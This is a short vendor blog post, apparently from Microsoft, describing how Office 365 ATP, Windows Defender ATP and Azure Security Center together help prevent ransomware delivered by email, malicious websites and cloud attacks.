All Microsoft 365 threat protection users have email protected with Office 365 ATP, which helps stop unknown advanced threats sent via email. Office ATP will detonate all email attachments, determine if the file is malicious, and remove the file before final delivery of the email to a user mailbox. Additionally, Office ATP will assess links at the time of click, both in the body of an email and embedded in attachments, and detonate them to determine if they point to a malicious website. Since the attack surface is broad, attacks are often made directly against devices. As such, several new enhancements helping prevent ransomware are built into the latest version of Windows 10, leveraging machine learning and behavior-based technologies which lead the evolution of malware prevention. To directly attack the device, imagine if our attacker creates a website hosting exploit kits containing ransomware. Users visiting the site mistakenly download ransomware directly from the website. In such an event, Microsoft Edge leverages Windows Defender ATP's browser protection capability, which determines if a site is malicious and can block access, helping secure the ransomware entry point. Ransomware attacks also target workloads running in the cloud. Azure Security Center helps provide visibility into your cloud infrastructure, leveraging machine learning backed up by the Intelligent Security Graph to provide actionable alerts and recommendations on mitigating such threats, as shown in figure 4. While none of these services alone can protect the entire modern workplace, together as Microsoft 365 threat protection, organizations can have confidence that Microsoft helps reduce threats from all vectors. Next week, we'll demonstrate how Microsoft 365 threat protection services help detect ransomware attacks.

Figure 4. The Azure Security Center Dashboard.

More blog posts from this series:
